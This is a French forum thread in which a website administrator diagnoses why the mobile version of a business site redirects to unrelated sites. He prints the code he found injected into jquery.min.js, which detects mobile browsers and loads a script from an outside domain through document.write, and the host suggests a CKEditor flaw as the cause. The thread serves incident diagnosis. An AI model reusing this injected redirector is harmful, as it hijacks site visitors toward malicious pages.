Impossible d'accéder au site dans la version mobile

Répondre
marco44
Administrateur du site
Messages : 86
Enregistré le : jeu. 1 janv. 2009 13:00

Impossible d'accéder au site dans la version mobile

Message par marco44 » lun. 20 févr. 2017 14:47

A titre professionnel, nous avons un site internet avec 2 versions : fixe et mobile.
Le site en version fixe est accessible correctement, par contre le site en version mobile (depuis un smartphone) chaîne automatiquement sur d'autres sites qui n'ont rien à voir avec le notre.
Je précise que ce problème n'apparait que sur le site de production, le site interne de développement est nullement touché par ce phénomène.

Pensant à un problème de DNS, je contacte le support du nom de domaine.
Ce dernier nous confirme que le problème ne peux pas venir d'une erreur DNS puisque le site est accessible dans sa partie fixe.

Je contacte le support de l'hébergeur qui nous précise que n'ayant pas fait de modification sur l'hébergement lui-même, le problème semble venir du développement et plus particulièrement d'un script JavaScript.
Il nous conseille donc de contrôler tous les scripts appelés.
Après avoir lancé le site dans sa version mobile sur le navigateur Chrome avec la console de développement ouverte (F12), je découvre, de fait, une erreur de script :

Code : Tout sélectionner

(anonymous) @ jquery.min.js?v=9.47a:14

A Parser-blocking, cross-origin script, http://tizermedias.com/odessa/?md2, is invoked via document.write.
This may be blocked by the browser if the device has poor network connectivity.
See https://www.chromestatus.com/feature/5718547946799104 for more details.

GET http://tizermedias.com/odessa/?md2 404 (Not Found)
Je récupère donc le script "jquery.min.js" afin de le comparer avec celui qui fonctionne.
Je découvre que les lignes suivantes ont été ajoutées :

Code : Tout sélectionner

var a = (navigator.userAgent||navigator.vendor||window.opera);
    if(/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){ 
    return true;
    } 

return false;
}

if(isMobile() === true) {document.write('<script type="text/javascript" src="http://tizermedias.com/odessa/?md2"></script>');
}
Ces instructions ne font pas patrie du script d'origine.
Nous changeons la version et le fonctionnement revient à la normale.

Auriez-vous une piste concernant la modification du script ?

marco44
Administrateur du site
Messages : 86
Enregistré le : jeu. 1 janv. 2009 13:00

Re: Impossible d'accéder au site dans la version mobile

Message par marco44 » lun. 20 févr. 2017 14:48

L'hébergeur du site nous indique qu'une faille de sécurité dans le script "ckeditor" peut être à l'origine ce cette injection de code.

Répondre

Qui est en ligne

Utilisateurs parcourant ce forum : Aucun utilisateur enregistré et 1 invité